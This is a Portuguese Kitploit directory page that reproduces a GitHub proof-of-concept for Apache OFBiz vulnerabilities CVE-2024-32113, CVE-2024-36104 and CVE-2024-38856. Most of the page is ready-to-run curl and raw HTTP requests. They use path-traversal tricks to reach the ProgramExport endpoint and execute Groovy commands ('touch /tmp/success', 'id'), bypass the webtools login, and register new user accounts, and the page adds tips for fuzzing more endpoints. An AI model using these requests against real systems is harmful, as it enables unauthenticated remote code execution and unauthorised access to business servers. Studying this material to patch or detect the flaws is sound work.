Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-32113-POC — Vulnerabilidades do Apache OfBiz | Kitploit
Ferramentas/GitHubGitHub/racerz-fighting/cve-2024-32113-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticação
GitHubracerz-fighting/cve-2024-32113-poc

CVE-2024-32113-POC

Vulnerabilidades do Apache OfBiz

Ver Repositório
824há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Vulnerabilidades do Apache OfBiz

POC para CVE-2024-32113

Os parâmetros USERNAME e PASSWORD podem ser fornecidos na interface /ecomseo/AnonContactus, que é publicamente acessível a qualquer pessoa.

  • POC1:RCE

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/ProgramExport' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
    
  • POC2:Você pode contornar o login para acessar a interface de gerenciamento restrita do webtools.

    root@kitploit:~
    curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/login/' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'JavaScriptEnabled=Y'
    
Baixar ferramenta
  • POC3:Você pode registrar uma conta de usuário comum, onde userLoginId é o nome de usuário.

    root@kitploit:~
    curl --noproxy '*'  -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/../../../%2e/webtools/control/createUserLogin' \
    --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
    --header 'Accept: */*' \
    --header 'Host: 127.0.0.1:8443' \
    --header 'Connection: keep-alive' \
    --header 'Content-Type: application/x-www-form-urlencoded' \
    --data-urlencode '[email protected]' \
    --data-urlencode 'PASSWORD=12345' \
    --data-urlencode 'JavaScriptEnabled=Y' \
    --data-urlencode 'enabled=Y' \
    --data-urlencode 'partyId=' \
    --data-urlencode 'userLoginId=30000' \
    --data-urlencode 'currentPassword=12345' \
    --data-urlencode 'currentPasswordVerify=12345' \
    --data-urlencode 'passwordHint=' \
    --data-urlencode 'requirePasswordChange=N' \
    --data-urlencode 'securityQuestion=' \
    --data-urlencode 'SecurityAnswer=' \
    --data-urlencode 'externalAuthId='
    
  • POC para CVE-2024-36104

    • RCE1

      root@kitploit:~
      curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/.%2e/.%2e/.%2e/webtools/control/ProgramExport' \
      --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
      --header 'Accept: */*' \
      --header 'Host: 127.0.0.1:8443' \
      --header 'Connection: keep-alive' \
      --header 'Content-Type: application/x-www-form-urlencoded' \
      --data-urlencode '[email protected]' \
      --data-urlencode 'JavaScriptEnabled=Y' \
      --data-urlencode 'PASSWORD=12345' \
      --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
      
    • RCE2

      root@kitploit:~
      curl --noproxy '*' -k --location --request POST 'https://127.0.0.1:8443/xxx/yyy/zzz/..;/..;/..;/webtools/control/ProgramExport' \
      --header 'User-Agent: Apifox/1.0.0 (https://apifox.com)' \
      --header 'Accept: */*' \
      --header 'Host: 127.0.0.1:8443' \
      --header 'Connection: keep-alive' \
      --header 'Content-Type: application/x-www-form-urlencoded' \
      --data-urlencode '[email protected]' \
      --data-urlencode 'JavaScriptEnabled=Y' \
      --data-urlencode 'PASSWORD=12345' \
      --data-urlencode 'groovyProgram=println (('\''tou'\'' + '\''ch /tmp/success'\'').execute().text);'
      

      PS: ; fará com que a definição de cookie lance uma exceção; você precisa obter o cookie manualmente.

      image-20240514104449523

    image-20240514104433195

    POC para CVE-2024-38856

    • RCE

      root@kitploit:~
      POST /webtools/control/forgotPassword/ProgramExport HTTP/1.1
      Content-Type: application/x-www-form-urlencoded
      Host: 127.0.0.1:8443
      
      groovyProgram=throw+new+Exception('id'.execute().text);
      

      PS:O forgotPassword pode ser substituído por outras requisições. Você pode tentar pesquisá-lo em webapp/webtools/WEB-INF/controller.xml (como mostrado na imagem) para realizar fuzzing. Desde que a requisição retorne success com sucesso, ela pode acionar RCE no módulo ProgramExport.

      image-20240604195154504